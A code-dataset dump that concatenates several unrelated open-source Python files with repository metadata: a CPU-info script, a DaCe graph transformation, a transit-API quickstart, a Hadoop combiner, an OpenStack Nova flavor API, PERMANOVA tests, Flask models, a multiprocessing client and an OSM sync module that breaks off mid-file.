] | null | null | null | cpu.py | ArkAngeL43/cpu-info | d7da58718ca7ea85174e321e870a085856154184 | [
"MIT"
] | null | null | null | cpu.py | ArkAngeL43/cpu-info | d7da58718ca7ea85174e321e870a085856154184 | [
"MIT"
] | null | null | null | import os
import sys
import psutil
import colorama
import time
from colorama import Fore, Back, Style
# Banner: clear the terminal, show attribution and the current date, pause,
# then clear again before printing the actual CPU report.
os.system(' clear ')
print(":::::::::::::::::::::::::::::::::::::")
time.sleep(0.1)
print(": Created and designed by Ark Angel :")
time.sleep(0.1)
print(":::::::::::::::::::::::::::::::::::::")
time.sleep(0.1)
print(":::::::::::::::::::::::::::::::::::::")
os.system(' date ')
print(":::::::::::::::::::::::::::::::::::::")
time.sleep(4)
os.system(' clear ')
# Core counts: physical (logical=False) vs. logical/hyper-threaded total.
print(Fore.MAGENTA+"================CORE===============")
print("Physical cores:", psutil.cpu_count(logical=False))
print("Total cores:", psutil.cpu_count(logical=True))
# CPU frequency in MHz as reported by psutil.
print(Fore.YELLOW+"=================FREQ================")
cpufreq = psutil.cpu_freq()
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
# NOTE(review): "CUrrent" typo in the output string below -- it is runtime
# output, so fix it in a behavior-changing pass, not here.
print(f"CUrrent Frequency: {cpufreq.current:.2f}Mhz")
# Per-core utilization sampled over a 1-second interval.
print(Fore.MAGENTA+"================USAGE==============")
print("CPU Usage:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
    print(f"Core {i}: {percentage}%")
print(Fore.YELLOW+"==============TOTAL================")
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
795518d398345f195888040b978ddfa27f016074 | 3,375 | py | Python | dace/frontend/tensorflow/transformations/redundant_array.py | tobiasholenstein/dace | 38fb56d12b59aa8dfe8bb1ff0068e29c5c75efc9 | [
"BSD-3-Clause"
] | null | null | null | dace/frontend/tensorflow/transformations/redundant_array.py | tobiasholenstein/dace | 38fb56d12b59aa8dfe8bb1ff0068e29c5c75efc9 | [
"BSD-3-Clause"
] | null | null | null | dace/frontend/tensorflow/transformations/redundant_array.py | tobiasholenstein/dace | 38fb56d12b59aa8dfe8bb1ff0068e29c5c75efc9 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2019-2020 ETH Zurich and the DaCe authors. All rights reserved.
""" Contains classes that implement a redundant array removal transformation.
"""
from dace.sdfg import nodes
from dace.sdfg import utils as sdutil
from dace.transformation import transformation as pm
from dace.config import Config
class TensorflowRedundantArray(pm.Transformation):
    """ Implements the redundant array removal transformation, applied
        to remove ReadVariableOps and control dependencies. """
    # Running tally of removed arrays; only incremented when the
    # "debugprint" config flag is set (see apply()).
    _arrays_removed = 0
    # Pattern nodes for matching: an access node feeding directly into
    # another access node.  "_" is a placeholder name bound during matching.
    _in_array = nodes.AccessNode("_")
    _out_array = nodes.AccessNode("_")
    @staticmethod
    def expressions():
        # Subgraph pattern to match: _in_array -> _out_array.
        return [
            sdutil.node_path_graph(TensorflowRedundantArray._in_array,
                                   TensorflowRedundantArray._out_array)
        ]
    @staticmethod
    def can_be_applied(graph, candidate, expr_index, sdfg, strict=False):
        in_array = graph.nodes()[candidate[TensorflowRedundantArray._in_array]]
        out_array = graph.nodes()[candidate[
            TensorflowRedundantArray._out_array]]
        # Just to be sure, check for the OP name in the out array
        if not ("ReadVariable" in out_array.data
                or "control_dependency" in out_array.data):
            return False
        # Make sure that the candidate is a transient variable
        if not in_array.desc(sdfg).transient:
            return False
        # Make sure that both arrays are using the same storage location
        if in_array.desc(sdfg).storage != out_array.desc(sdfg).storage:
            return False
        # Only apply if arrays are of same shape (no need to modify subset)
        if len(in_array.desc(sdfg).shape) != len(
                out_array.desc(sdfg).shape) or any(i != o for i, o in zip(
                    in_array.desc(sdfg).shape,
                    out_array.desc(sdfg).shape)):
            return False
        return True
    @staticmethod
    def match_to_str(graph, candidate):
        out_array = graph.nodes()[candidate[
            TensorflowRedundantArray._out_array]]
        return "Remove " + str(out_array)
    def apply(self, sdfg):
        # Rewires every consumer of out_array to read from in_array, then
        # deletes out_array from the state graph.
        def gnode(nname):
            # Resolve a pattern-node name to the matched graph node.
            return graph.nodes()[self.subgraph[nname]]
        graph = sdfg.nodes()[self.state_id]
        in_array = gnode(TensorflowRedundantArray._in_array)
        out_array = gnode(TensorflowRedundantArray._out_array)
        for e in graph.out_edges(out_array):
            # Modify all outgoing edges to point to in_array
            path = graph.memlet_tree(e)
            for pe in path:
                if pe.data.data == out_array.data:
                    pe.data.data = in_array.data
            # Preemptively add edge from in_array to out_array's adjacent
            # nodes.
            # NOTE(review): new_memlet aliases e.data rather than copying
            # it; confirm a shared memlet object is safe here.
            new_memlet = e.data
            new_memlet.data = in_array.data
            graph.add_edge(in_array, e.src_conn, e.dst, e.dst_conn, new_memlet)
            graph.remove_edge(e)
        # Best-effort sanity check: warn (don't abort) if out_array has
        # more than one producer; only the first in-edge is removed below.
        try:
            assert len(graph.in_edges(out_array)) == 1
        except AssertionError:
            print("Multiple in-edges for ", str(out_array))
        e = graph.in_edges(out_array)[0]
        graph.remove_edge(e)
        # Finally, remove out_array node
        graph.remove_node(out_array)
        if Config.get_bool("debugprint"):
            TensorflowRedundantArray._arrays_removed += 1
795519b0009eaed7f52a53feaa0252dfd6272861 | 1,170 | py | Python | docs/source/quickstart.py | Mause/pytransperth | 411c6a38b8451dc917927bdc4fdb70aeb9acd52b | [
"MIT"
] | null | null | null | docs/source/quickstart.py | Mause/pytransperth | 411c6a38b8451dc917927bdc4fdb70aeb9acd52b | [
"MIT"
] | null | null | null | docs/source/quickstart.py | Mause/pytransperth | 411c6a38b8451dc917927bdc4fdb70aeb9acd52b | [
"MIT"
] | null | null | null | import os
import sys
# Make the repository root importable when running this example from the
# docs/source directory.
sys.path.insert(
    0,
    os.path.join(os.path.dirname(__file__), '..', '..')
)
# Step 1: create the Location objects you wish to resolve.
from transperth.jp.location import (
    Location,
    ResolvedLocation,
    determine_location
)
from_location = Location.from_location('Curtin University, Perth')
to_location = Location.from_location('Arena Joondalup')
# Step 2: resolve them into something the Transperth API will accept.
locations = determine_location(from_location, to_location)
# For illustration only -- determine_location returns a dictionary shaped
# like this (the bare literal below is not used by the script):
{
    '<DIRECTION>': [
        ResolvedLocation('<NAME>', '<CODE>'),
        # etc
    ]
}
# It is reasonable to assume the first result is correct, or to let the
# end user choose from the list.
from_location = locations['from'][0]
to_location = locations['to'][0]
# Step 3: once we have resolved endpoints, fetch the candidate routes.
from transperth.jp.routes import determine_routes
routes = determine_routes(from_location, to_location)
# Take your pick of the routes...
route = routes[0]
# ...and use them however you like, e.g. print the trip duration.
from transperth.smart_rider.trips import timedelta_repr
print(timedelta_repr(route['meta']['duration']))
79551a233b77fd2cb307c95dfa9a31e792ffa8bb | 667 | py | Python | coursework2/task3/combiner_2.py | foundnet/UOE_EP_coursework1 | 25ab8ff2beaa4fbde5a0d4519abb84d8e43cf9d8 | [
"Apache-2.0"
] | null | null | null | coursework2/task3/combiner_2.py | foundnet/UOE_EP_coursework1 | 25ab8ff2beaa4fbde5a0d4519abb84d8e43cf9d8 | [
"Apache-2.0"
] | null | null | null | coursework2/task3/combiner_2.py | foundnet/UOE_EP_coursework1 | 25ab8ff2beaa4fbde5a0d4519abb84d8e43cf9d8 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Hadoop-streaming combiner (Python 2 print-statement syntax): merges
# adjacent records for the same uid, summing their counts and joining
# their id lists.  Input lines are "<uid>\t<count>\t<ids>" and must arrive
# sorted/grouped by uid, since only adjacent runs are merged.
import sys
# Accumulators for the uid run currently being merged.
cur_ids = ""
cur_cnt = 0
cur_uid = ""
for line in sys.stdin:
    # maxsplit=2 keeps any further tabs inside the ids field intact.
    str_uid,str_cnt,str_ids = line.split("\t",2)
    str_uid = str_uid.strip()
    str_cnt = str_cnt.strip()
    str_ids = str_ids.strip()
    # Skip malformed records with an empty uid or id list.
    if str_uid == "" or str_ids == "":
        continue
    if str_uid != cur_uid:
        # New uid: flush the previous run (if any) and start a new one.
        if cur_uid != "":
            print cur_uid + "\t" + str(cur_cnt) + "\t" + cur_ids
        cur_uid = str_uid
        cur_cnt = int(str_cnt)
        cur_ids = str_ids
    else :
        # Same uid as previous line: accumulate.
        cur_cnt = cur_cnt + int(str_cnt)
        cur_ids = cur_ids + ", " + str_ids
# Flush the final run after EOF on stdin.
if cur_uid != "":
    print cur_uid + "\t" + str(cur_cnt) + "\t" + cur_ids
79551b1c329e55581fd53fc00f1d907e09c97fe2 | 3,344 | py | Python | nova/api/openstack/compute/contrib/flavormanage.py | bopopescu/nova-33 | 6d3cf9010a45edb16f28b2582eafe35666381d1f | [
"Apache-2.0"
] | 1 | 2019-11-06T12:21:59.000Z | 2019-11-06T12:21:59.000Z | nova/api/openstack/compute/contrib/flavormanage.py | bopopescu/nova-33 | 6d3cf9010a45edb16f28b2582eafe35666381d1f | [
"Apache-2.0"
] | null | null | null | nova/api/openstack/compute/contrib/flavormanage.py | bopopescu/nova-33 | 6d3cf9010a45edb16f28b2582eafe35666381d1f | [
"Apache-2.0"
] | 2 | 2019-12-23T18:06:28.000Z | 2020-07-24T08:44:28.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import webob
from nova.api.openstack.compute import flavors as flavors_api
from nova.api.openstack.compute.views import flavors as flavors_view
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.compute import instance_types
from nova import exception
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'flavormanage')
class FlavorManageController(wsgi.Controller):
    """
    The Flavor Lifecycle API controller for the OpenStack API.

    Exposes admin-only ``create`` and ``delete`` actions for instance
    flavors (instance types).
    """
    _view_builder_class = flavors_view.ViewBuilder

    def __init__(self):
        super(FlavorManageController, self).__init__()

    @wsgi.action("delete")
    def _delete(self, req, id):
        """Delete the flavor identified by ``id``; 202 on success."""
        context = req.environ['nova.context']
        authorize(context)

        try:
            flavor = instance_types.get_instance_type_by_flavor_id(
                    id, ctxt=context, read_deleted="no")
        # Bug fix: "except exception.NotFound, e:" is Python 2-only syntax
        # (a SyntaxError under Python 3); "as" works on 2.6+ and 3.x.
        except exception.NotFound as e:
            raise webob.exc.HTTPNotFound(explanation=e.format_message())

        instance_types.destroy(flavor['name'])
        return webob.Response(status_int=202)

    @wsgi.action("create")
    @wsgi.serializers(xml=flavors_api.FlavorTemplate)
    def _create(self, req, body):
        """Create a flavor from the request body and return its view.

        Raises HTTPConflict when a flavor with the same name already exists.
        """
        context = req.environ['nova.context']
        authorize(context)

        vals = body['flavor']
        name = vals['name']
        flavorid = vals.get('id')
        memory_mb = vals.get('ram')
        vcpus = vals.get('vcpus')
        root_gb = vals.get('disk')
        ephemeral_gb = vals.get('OS-FLV-EXT-DATA:ephemeral')
        swap = vals.get('swap')
        rxtx_factor = vals.get('rxtx_factor')
        # Flavors are public unless the extension attribute says otherwise.
        is_public = vals.get('os-flavor-access:is_public', True)

        try:
            flavor = instance_types.create(name, memory_mb, vcpus,
                                           root_gb, ephemeral_gb, flavorid,
                                           swap, rxtx_factor, is_public)
            req.cache_db_flavor(flavor)
        except exception.InstanceTypeExists as err:
            raise webob.exc.HTTPConflict(explanation=err.format_message())

        return self._view_builder.show(req, flavor)
class Flavormanage(extensions.ExtensionDescriptor):
    """Flavor create/delete API support."""

    name = "FlavorManage"
    alias = "os-flavor-manage"
    namespace = ("http://docs.openstack.org/compute/ext/"
                 "flavor_manage/api/v1.1")
    updated = "2012-01-19T00:00:00+00:00"

    def get_controller_extensions(self):
        # Attach the management controller to the existing "flavors" resource.
        return [
            extensions.ControllerExtension(
                self, 'flavors', FlavorManageController()),
        ]
| 34.474227 | 79 | 0.668062 |
79551c683cbf26a998989f21ef12f4f391065232 | 3,749 | py | Python | app/models.py | brianngichu/pitches | d113fd851b3c6da3fab1f7e5774bc373f3d59f26 | [
"MIT"
] | null | null | null | app/models.py | brianngichu/pitches | d113fd851b3c6da3fab1f7e5774bc373f3d59f26 | [
"MIT"
] | null | null | null | app/models.py | brianngichu/pitches | d113fd851b3c6da3fab1f7e5774bc373f3d59f26 | [
"MIT"
] | null | null | null | from . import db, login_manager
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: reload a User from the session's stored id."""
    return User.query.get(int(user_id))
# Application account model; UserMixin supplies the Flask-Login interface.
class User(UserMixin, db.Model):
    """A registered user who can post pitches and comments."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key = True)
    username = db.Column(db.String(255))
    email = db.Column(db.String(255))
    # Salted password hash (werkzeug); the clear text is never stored.
    pass_secure = db.Column(db.String(255))
    pitches = db.relationship('Pitch', backref = 'user', lazy = "dynamic")
    comments = db.relationship('Comment', backref = 'user', lazy = "dynamic")
    bio = db.Column(db.String(255))
    profile_pic_path = db.Column(db.String(100))
    photoprofiles = db.relationship('PhotoProfile', backref = 'user', lazy = 'dynamic')
    @property
    def password(self):
        """Write-only attribute: reading it always raises AttributeError."""
        raise AttributeError('You cannot read the password attribute')
    @password.setter
    def password(self, password):
        # Hash the clear-text password and store only the hash.
        self.pass_secure = generate_password_hash(password)
    def verify_password(self, password):
        """Return True if *password* matches the stored hash."""
        return check_password_hash(self.pass_secure, password)
    def __repr__(self):
        return f'User {self.username}'
class Pitch(db.Model):
    """A user-submitted pitch belonging to a category."""
    __tablename__ = 'pitches'
    id = db.Column(db.Integer, primary_key = True)
    title = db.Column(db.String(255))
    content = db.Column(db.String)
    # FK to Category; note the mapped attribute is named "category",
    # not "category_id".
    category = db.Column(db.Integer, db.ForeignKey('categories.id'))
    vote = db.Column(db.Integer)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    comments = db.relationship('Comment', backref = 'pitches', lazy = "dynamic")
    votes = db.relationship('Vote', backref = 'pitches', lazy = "dynamic")
    def save_pitch(self):
        """Persist this pitch to the database."""
        db.session.add(self)
        db.session.commit()
    @classmethod
    def clear_pitches(cls):
        # NOTE(review): Pitch defines no "all_pitches" attribute, so this
        # raises AttributeError if called -- looks like a leftover from an
        # in-memory implementation; confirm before relying on it.
        Pitch.all_pitches.clear()
    # display pitches
    def get_pitches(id):
        """Return all pitches in the category with the given id."""
        # Bug fix: the mapped attribute is "category"; filtering by the
        # nonexistent "category_id" raised an InvalidRequestError.
        pitches = Pitch.query.filter_by(category=id).all()
        return pitches
class Category(db.Model):
    """Lookup table of pitch categories."""
    __tablename__ = 'categories'
    id = db.Column(db.Integer, primary_key = True)
    name = db.Column(db.String)
    def save_category(self):
        """Persist this category to the database."""
        db.session.add(self)
        db.session.commit()
    @classmethod
    def get_categories(cls):
        """Return every category."""
        categories = Category.query.all()
        return categories
class Comment(db.Model):
    """A user's comment (feedback) on a pitch."""
    __tablename__ = 'comments'
    id = db.Column(db.Integer, primary_key = True)
    feedback = db.Column(db.String)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    pitch_id = db.Column(db.Integer, db.ForeignKey('pitches.id'))
    votes = db.relationship('Vote', backref = 'comments', lazy = "dynamic")
    def save_comment(self):
        '''
        Function that saves comments
        '''
        db.session.add(self)
        db.session.commit()
    @classmethod
    def get_comments(self, id):
        """Return all comments attached to the pitch with the given id."""
        # Bug fix: the original referenced an undefined "Comments" name, a
        # nonexistent "time_posted" column and a misspelled "pitches_id"
        # attribute, so it always raised NameError.  This model has no
        # timestamp column, so no chronological ordering is applied.
        comment = Comment.query.filter_by(pitch_id=id).all()
        return comment
class Vote(db.Model):
    """A vote recorded against a pitch or a comment."""
    __tablename__ = 'votes'
    id = db.Column(db.Integer, primary_key = True)
    vote = db.Column(db.Integer)
    pitch_id = db.Column(db.Integer, db.ForeignKey('pitches.id'))
    comment_id = db.Column(db.Integer, db.ForeignKey('comments.id'))
    def save_vote(self):
        """Persist this vote to the database."""
        db.session.add(self)
        db.session.commit()
    @classmethod
    def get_votes(cls,user_id,pitches_id):
        """Return votes for the given pitch.

        ``user_id`` is kept for interface compatibility, but Vote defines
        no user_id column, so it cannot be used as a filter criterion.
        """
        # Bug fix: filtering by the nonexistent "user_id"/"pitches_id"
        # attributes raised an error; the pitch FK attribute is "pitch_id".
        # TODO(review): add a user_id column if per-user lookup is needed.
        votes = Vote.query.filter_by(pitch_id=pitches_id).all()
        return votes
class PhotoProfile(db.Model):
    """Profile photo record linked to a user (see user_id FK below)."""
    __tablename__ = 'photoprofiles'
    id = db.Column(db.Integer, primary_key = True)
    # Filesystem path of the stored picture.
    pic_path = db.Column(db.String())
user_id = db.Column(db.Integer, db.ForeignKey("users.id")) | 32.6 | 101 | 0.670846 |
79551d1e2e8b3826bda7e6b578fc2d4f7809a543 | 224 | py | Python | src/11/simple_communication_between_interpreters/echoclient.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 14 | 2017-05-20T04:06:46.000Z | 2022-01-23T06:48:45.000Z | src/11/simple_communication_between_interpreters/echoclient.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 1 | 2021-06-10T20:17:55.000Z | 2021-06-10T20:17:55.000Z | src/11/simple_communication_between_interpreters/echoclient.py | tuanavu/python-gitbook | 948a05e065b0f40afbfd22f697dff16238163cde | [
"MIT"
] | 15 | 2017-03-29T17:57:33.000Z | 2021-08-24T02:20:08.000Z | from multiprocessing.connection import Client
c = Client(('localhost', 25000), authkey=b'peekaboo')
c.send('hello')
print('Got:', c.recv())
c.send(42)
print('Got:', c.recv())
c.send([1, 2, 3, 4, 5])
print('Got:', c.recv())
| 22.4 | 53 | 0.642857 |
79551d6e70816185307a12a6ed9a28ab4a860c3b | 3,839 | py | Python | skbio/maths/stats/distance/tests/test_permanova.py | Jorge-C/bipy | 1097cefafc6f9bbb9d96f25b569892a3fe3f3600 | [
"BSD-3-Clause"
] | null | null | null | skbio/maths/stats/distance/tests/test_permanova.py | Jorge-C/bipy | 1097cefafc6f9bbb9d96f25b569892a3fe3f3600 | [
"BSD-3-Clause"
] | null | null | null | skbio/maths/stats/distance/tests/test_permanova.py | Jorge-C/bipy | 1097cefafc6f9bbb9d96f25b569892a3fe3f3600 | [
"BSD-3-Clause"
] | 1 | 2018-09-21T01:58:43.000Z | 2018-09-21T01:58:43.000Z | #! /usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import division
from unittest import TestCase, main
import numpy as np
import numpy.testing as npt
from skbio.core.distance import DistanceMatrix
from skbio.maths.stats.distance.permanova import PERMANOVA
class PERMANOVATests(TestCase):
    """All results were verified with R (vegan::adonis)."""
    def setUp(self):
        """Build fixture distance matrices and PERMANOVA instances."""
        # Distance matrices with and without ties in the ranks, with 2 groups
        # of equal size.
        dm_ids = ['s1', 's2', 's3', 's4']
        grouping_equal = ['Control', 'Control', 'Fast', 'Fast']
        self.dm_ties = DistanceMatrix([[0, 1, 1, 4],
                                       [1, 0, 3, 2],
                                       [1, 3, 0, 3],
                                       [4, 2, 3, 0]], dm_ids)
        self.dm_no_ties = DistanceMatrix([[0, 1, 5, 4],
                                          [1, 0, 3, 2],
                                          [5, 3, 0, 3],
                                          [4, 2, 3, 0]], dm_ids)
        # Test with 3 groups of unequal size.
        grouping_unequal = ['Control', 'Treatment1', 'Treatment2',
                            'Treatment1', 'Control', 'Control']
        self.dm_unequal = DistanceMatrix(
            [[0.0, 1.0, 0.1, 0.5678, 1.0, 1.0],
             [1.0, 0.0, 0.002, 0.42, 0.998, 0.0],
             [0.1, 0.002, 0.0, 1.0, 0.123, 1.0],
             [0.5678, 0.42, 1.0, 0.0, 0.123, 0.43],
             [1.0, 0.998, 0.123, 0.123, 0.0, 0.5],
             [1.0, 0.0, 1.0, 0.43, 0.5, 0.0]],
            ['s1', 's2', 's3', 's4', 's5', 's6'])
        self.permanova_ties = PERMANOVA(self.dm_ties, grouping_equal)
        self.permanova_no_ties = PERMANOVA(self.dm_no_ties, grouping_equal)
        self.permanova_unequal = PERMANOVA(self.dm_unequal, grouping_unequal)
    def test_call_ties(self):
        """Statistic/p-value on the tied matrix; results must be repeatable."""
        # Ensure we get the same results if we rerun the method on the same
        # object.
        for trial in range(2):
            # Seed NumPy so the permutation p-value is deterministic.
            np.random.seed(0)
            obs = self.permanova_ties()
            self.assertEqual(obs.sample_size, 4)
            npt.assert_array_equal(obs.groups, ['Control', 'Fast'])
            self.assertAlmostEqual(obs.statistic, 2.0)
            self.assertAlmostEqual(obs.p_value, 0.671)
            self.assertEqual(obs.permutations, 999)
    def test_call_no_ties(self):
        """Statistic/p-value on the matrix without rank ties."""
        np.random.seed(0)
        obs = self.permanova_no_ties()
        self.assertEqual(obs.sample_size, 4)
        npt.assert_array_equal(obs.groups, ['Control', 'Fast'])
        self.assertAlmostEqual(obs.statistic, 4.4)
        self.assertAlmostEqual(obs.p_value, 0.332)
        self.assertEqual(obs.permutations, 999)
    def test_call_no_permutations(self):
        """With zero permutations no p-value can be computed."""
        obs = self.permanova_no_ties(0)
        self.assertEqual(obs.sample_size, 4)
        npt.assert_array_equal(obs.groups, ['Control', 'Fast'])
        self.assertAlmostEqual(obs.statistic, 4.4)
        self.assertEqual(obs.p_value, None)
        self.assertEqual(obs.permutations, 0)
    def test_call_unequal_group_sizes(self):
        """Three groups of unequal size."""
        np.random.seed(0)
        obs = self.permanova_unequal()
        self.assertEqual(obs.sample_size, 6)
        npt.assert_array_equal(obs.groups,
                               ['Control', 'Treatment1', 'Treatment2'])
        # Third positional argument is the number of decimal places.
        self.assertAlmostEqual(obs.statistic, 0.578848, 6)
        self.assertAlmostEqual(obs.p_value, 0.645)
        self.assertEqual(obs.permutations, 999)
if __name__ == '__main__':
    main()
| 38.777778 | 78 | 0.545715 |
795520740f095dac13b6bbb72ecd49be231df0bc | 7,693 | py | Python | src/py4geo/populate/tools.py | manuelep/py4geo | ad1b25f89b2f254d7270d05123fb3e6cb91186a9 | [
"Apache-2.0"
] | null | null | null | src/py4geo/populate/tools.py | manuelep/py4geo | ad1b25f89b2f254d7270d05123fb3e6cb91186a9 | [
"Apache-2.0"
] | null | null | null | src/py4geo/populate/tools.py | manuelep/py4geo | ad1b25f89b2f254d7270d05123fb3e6cb91186a9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from ..common import logger
from .optutils.base import Turbo
from . import io
import json
import osm2geojson
from ..tools.tile import Bbox
# from .tile import boxtiles
from tqdm import tqdm
from sys import stdout, getsizeof #, _getframe
from mptools.dataformat import smartbytes
import geojson
from supermercado.burntiles import burn
import mercantile
def T(s):
    """Translation hook: currently the identity function.

    Defined as a function (not a lambda assignment, PEP 8 E731) so a real
    gettext-style translator can be dropped in later.
    """
    return s

def get_uri(xtile, ytile, zoom):
    """Return the "x/y/z" identifier string for a slippy-map tile."""
    return "{xtile:d}/{ytile:d}/{zoom:d}".format(xtile=xtile, ytile=ytile, zoom=zoom)
class barFormat(object):
    """Build and parse tqdm-style "progress ..." status lines."""

    # Field names always present in a progress row.
    base_fmt = 'desc', 'n', 'rate', 'rate_inv', 'elapsed', 'remaining', 'unit',
    # Extra field names available when a total is known.
    augm_fmt = 'percentage', 'total',

    @staticmethod
    def cast(value):
        """Decode *value* as JSON when possible, else return it unchanged."""
        try:
            return json.loads(value)
        except ValueError:
            return value

    @classmethod
    def template(cls, augm=False):
        """Return the "progress {a};{b};..." template for the header set."""
        joined = '};{'.join(cls.headers(augm=augm))
        return 'progress ' + '{' + joined + '}'

    @classmethod
    def headers(cls, augm=True):
        """Return the field names, optionally including the augmented ones."""
        return cls.base_fmt + cls.augm_fmt if augm else cls.base_fmt

    @classmethod
    def parse(cls, *rows):
        """Lazily parse ";"-separated rows into dicts keyed by header name."""
        def row_to_dict(row):
            cells = (cell for cell in row.split(';') if cell.strip())
            return dict(zip(cls.headers(), (cls.cast(cell) for cell in cells)))
        # filter(None, ...) drops rows that produced an empty dict.
        return filter(None, map(row_to_dict, rows))
class MyTqdm(dict):
    """Dict of named iterables that drives a single shared tqdm bar.

    Each keyword argument is a sequence; the bar total is the combined
    length of all of them.
    """
    def __init__(self, desc, **kwargs):
        super(MyTqdm, self).__init__(**kwargs)
        # Overall total: sum of the lengths of every supplied sequence.
        tot = sum(map(len, kwargs.values()))
        self.tqdm = tqdm(
            desc = desc,
            total = tot,
            # bar_format = barFormat.template(not not tot),
            # file = stdout
        )
    def set_description(self, *args, **kwargs):
        """Proxy straight through to the underlying tqdm bar."""
        return self.tqdm.set_description(*args, **kwargs)
    def __getattr__(self, key):
        # Attribute access by a stored key consumes that sequence, ticking
        # the bar once per element.  NOTE(review): despite the generator,
        # the list comprehension consumes everything eagerly, so the whole
        # sequence is materialised on first access -- confirm intended.
        def __main():
            for v in self[key]:
                self.tqdm.update(1)
                yield v
        return [x for x in __main()]
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        # Close the bar when used as a context manager.
        self.tqdm.close()
def fetch_and_log_from_osm(query, pgcopy=False):
    """Run an Overpass query and store the result in the database.

    query @string : The OSM filter query; Overpass QL or XML.
    pgcopy @bool : forwarded to io.osm; presumably selects PostgreSQL
        COPY-based inserts -- TODO confirm against io.osm.
    """
    # out_task_id = web2py_uuid()
    # plugins.planet.logger.info("### {} >>>".format(out_task_id))
    # plugins.planet.logger.info(query)
    turbo = Turbo()
    data = turbo(query.encode())
    # Materialise each element type, showing a progress bar while iterating.
    nodes = list(tqdm(
        data.nodes,
        desc = str(T('Downloading nodes from osm')),
        # bar_format = barFormat.template(True if data.nodes else False),
        # file = stdout
    ))
    ways = list(tqdm(
        data.ways,
        desc = str(T('Downloading ways from osm')),
        # bar_format = barFormat.template(True if data.ways else False),
        # file = stdout
    ))
    relations = list(tqdm(
        data.relations,
        desc = str(T('Downloading relations from osm')),
        # bar_format = barFormat.template(True if data.relations else False),
        # file = stdout
    ))
    # dcounter = MyTqdm(
    #     str(T('Saving data to DB')),
    #     nodes = nodes,
    #     ways = ways,
    #     relations = relations
    # )
    # io.osm(dcounter.nodes, dcounter.ways, dcounter.relations, copy=pgcopy)
    # Persist everything and commit in one go.
    io.osm(*map(tqdm, (nodes, ways, relations,)), copy=pgcopy)
    io.db.commit()
    # if request.is_scheduler:
    #     timeLoggerDecorator(plugins.planet.logger)(Put.commit())
    # NOTE: getsizeof is shallow, so this under-reports the payload size.
    logger.info("Response size: {}".format(smartbytes(getsizeof(data))))
    # plugins.planet.logger.info("<<< {} ###".format(out_task_id[:8]))
    # return out_task_id
class Syncher(object):
    """Synchronise one slippy-map tile worth of OSM data into the DB."""

    DEFAULT_GTYPES = ('node', 'way', 'relation')

    def __init__(self, xtile, ytile, zoom, uri=None, query=None, gtypes=None):
        """
        xtile, ytile, zoom @int : slippy-map tile coordinates
        uri @string : optional identifier; defaults to "x/y/z"
        query : Overpass filter structure; defaults to a match-everything query
        gtypes @list : OSM element types to fetch (default: node/way/relation)
        """
        super(Syncher, self).__init__()
        if gtypes is None:
            # Bug fix: avoid the shared mutable default list the original
            # signature used (gtypes=['node', 'way', 'relation']).
            gtypes = list(self.DEFAULT_GTYPES)
        self.uri = uri or get_uri(xtile, ytile, zoom)
        self.tile = {'x': xtile, 'y': ytile, 'z': zoom}
        tile_bounds = mercantile.bounds(
            mercantile.quadkey_to_tile(mercantile.quadkey(xtile, ytile, zoom)))
        # minx, miny, maxx, maxy serialised as strings for the query builder.
        self.bbox = {
            'w': str(tile_bounds.west),
            's': str(tile_bounds.south),
            'e': str(tile_bounds.east),
            'n': str(tile_bounds.north),
        }
        if query is None:
            # Match everything: a key that never exists, negated.
            query = [[{"k": "qwertyuiop", "modv": "not", "regv": "."}]]
        self.base_query = {
            'query': query,
            'bbox': self.bbox,
            # Bug fix: the gtypes argument used to be silently ignored in
            # favour of a hard-coded list; it is now honoured (the default
            # behaviour is unchanged).
            'gtypes': list(gtypes),
        }

    def __call__(self, newer_than=None, pgcopy=False):
        """
        newer_than @datetime : Last update timestamp; when given, restricts
            the query to objects changed after it (UTC, ISO-8601).
        pgcopy @bool : forwarded to fetch_and_log_from_osm.
        """
        _query = dict(self.base_query)
        if newer_than is not None:
            _query['newer_than'] = newer_than.strftime("%Y-%m-%dT%H:%M:%SZ")
        fetch_and_log_from_osm(
            Turbo.build_query(lambda: [_query]),
            pgcopy = pgcopy
        )
def get_polys(featureCollection):
    """Yield every polygon in *featureCollection* as a Polygon feature.

    Polygon features are passed through untouched; each part of a
    MultiPolygon is re-wrapped as its own bare Polygon feature.  Features
    of any other geometry type are skipped.
    """
    for feature in featureCollection['features']:
        geometry = feature['geometry']
        kind = geometry['type']
        if kind == 'Polygon':
            yield feature
        elif kind == 'MultiPolygon':
            for rings in geometry['coordinates']:
                yield {
                    "type": "Feature",
                    "properties": {},
                    "geometry": {"type": "Polygon", "coordinates": rings},
                }
def tile2poly(xyz):
    """Return the GeoJSON polygon covering the (x, y, z) slippy-map tile."""
    bounds = mercantile.bounds(*xyz)
    box = Bbox(bounds.west, bounds.south, bounds.east, bounds.north)
    return box.as_gj_polygon
class OsmShell(object):
